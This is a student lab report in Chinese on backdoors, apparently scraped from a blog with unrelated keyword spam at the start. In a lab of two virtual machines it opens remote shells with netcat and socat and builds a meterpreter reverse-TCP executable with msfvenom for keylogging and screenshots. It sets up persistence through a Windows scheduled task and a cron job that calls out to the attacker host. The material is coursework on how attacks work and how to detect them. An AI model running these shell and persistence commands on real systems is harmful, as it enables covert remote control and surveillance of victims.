西安制作公司网站的公司,wordpress flashfxp,网站自适应 如何做,搭建网站一般要多少钱20145233《网络对抗》第二周 后门原理与实践 实验内容 windows主机与kali虚拟机实现互联互通使用netcat获取主机操作Shell#xff0c;cron启动使用socat获取主机操作Shell, 任务计划启动使用MSF meterpreter生成可执行文件#xff0c;利用ncat或socat传送到主机并运行获取主机… 20145233《网络对抗》第二周 后门原理与实践 实验内容 windows主机与kali虚拟机实现互联互通使用netcat获取主机操作Shellcron启动使用socat获取主机操作Shell, 任务计划启动使用MSF meterpreter生成可执行文件利用ncat或socat传送到主机并运行获取主机Shell使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容并尝试提权实验过程 什么是后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是如果这些后门被其他人知道或是在发布软件之前没有删除后门程序那么它就成了安全风险容易被黑客当成漏洞进行攻击。后门程序就是留在计算机系统中供某位特殊使用者通过某种特殊方式控制计算机系统的途径。后门程序跟我们通常所说的木马有联系也有区别。联系在于都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制。区别在于木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于特洛依木马简称木马其用途在于潜伏在电脑中从事搜集信息或便于黑客进入的动作。后门程序和电脑病毒最大的差别在于后门程序不一定有自我复制的动作也就是后门程序不一定会“感染”其它电脑。后门是一种登录系统的方法它不仅绕过系统已有的安全设置而且还能挫败系统上各种增强的安全设置。而且,在病毒命名中后门一般带有backdoor字样而木马一般则是Trojan字样。使用netcat获取主机操作Shellcron启动 linux获取windows的shell 首先两个操作系统中都要有ncat(本次实验中我的靶机有两个前半部分的实验我是在自己的win主机中完成的但是在后续的实验中kali发送的后门程序无法在我的主机中打开只好利用pki课程的虚拟机来完成后续实验)kali中已经自带window需要下载码云上的压缩包到window中解压到相应的system中可以直接在命令行中运行。这里ncat和后面用到的socat我都是在老师共享的码云附件中下载的。kali下使用ifconfig来获取卡里主机的ip。在kali下使用nc -l -p 5233来将5233设置成监听端口开始监听windows下输入netcat.exe -e cmd 192.168.85.129 5233实现kali对windowsshell的控制并利用ipconfig来验证。windows获取linux的shell windows下使用以下命令netcat.exe 192.168.85.129 5233监听kali下使用nc -e /bin/sh -l -p 5233反弹连接windows利用ifconfig验证ncat传输文件 windows系统使用ncat.exe -lv 1452 hhc_file.exe监听准备接受文件kali系统使用ncat -nv 192.168.85.129 1452 pwnx来发送指定文件使用socat获取主机操作Shell socat是ncat的增强版它使用的格式是socat [options] address address其中两个address是必选项而options 是可选项。socat的基本功能就是建立两个双向的字节流数据就在其间传输参数address就是代表了其中的一个方向。所谓流代表了数据的流向而数据则可以有许多不同的类型命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。kali上用socat tcp-listen:5233把cmd绑定到端口5233同時用socat tcp-l:5233 system:bash,pty,stderr反弹连接windows使用socat readline tcp:192.168.85.129:5233开启监听成功使用ifconfig检测meterpreter生成后门程序 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.85.129 LPORT208 -f exe 20145233.exe来生成后门程序然后发送到windows机中。使用msfconsole命令开启msf进行设置这时候监听已经开始了在windows中运行之前的后门程序可以成功控制远程shell。meterpreter信息搜集 首先可以用神奇的help来看看都有哪些指令其中指令很多但是我们本次实验中用的只是一小部分其他的功能可以在以后自己来了解。系统信息截取对靶机win7进行截图记录靶机的键盘记录安装为系统服务后门启动 Windows设置 在Windows系统下打开控制面板-管理工具-任务计划程序创建任务填写任务名称后新建一个触发器在操作-程序或脚本中选择你的socat.exe文件的路径在添加参数一栏填写tcp-listen:5233 exec:cmd.exe,pty,stderr这个命令的作用是把cmd.exe绑定到端口5233同时把cmd.exe的stderr重定向到stdout上我在这里设定为当系统启动的时候启动后门程序。 使用netcat获取主机操作Shellcron启动 kali下终端使用crontab -e修改配置文件根据格式m h dom mon dow user command来填写启动的时间加入下面一行* * * * * /bin/netcat 192.168.85.129 5233 -e /bin/sh第一个星号可以设置成0-59的数字即每小时的第几分钟启动同理下个星号是1-24小时下个是1-12···使用crontab -l查看配置文件实验问题回答 如何将一个后门安装到系统中 后门程序被捆绑或者伪装成正常的程序进入自己的系统。 不慎点了某些链接被植入了后门程序。例举你知道的后门如何启动起来(win及linux)的方式 后门修改权限使得自己在任务控制设定启动条件多种多样随意后门程序设置。Meterpreter有哪些给你映像深刻的功能 记录键盘输入记录配合屏幕摄像头的截图来获取靶机使用者的信息这就很可怕了。攻击者拿到信息后想干什么干什么。如何发现自己有系统有没有被安装后门 利用杀毒软件定期清理未知文件。 开启防火墙对于某些默认的端口来查看是什么程序在使用进行分析。 实验总结本次实验在完成的时候我才真的觉得自己学习了好玩并且实用的东西也理解到了后门攻击往往存在在很多地方这些隐患其实是很致命的。比如配合屏幕截图及键盘记录可以很轻易的来获取被攻击者的密码资料等因为虚拟机的实验环境没有摄像头的驱动程序所以没办法完成人脸捕捉。这次实验让我对于网络攻防更有兴趣了。转载于:https://www.cnblogs.com/hanhaochen/p/6558605.html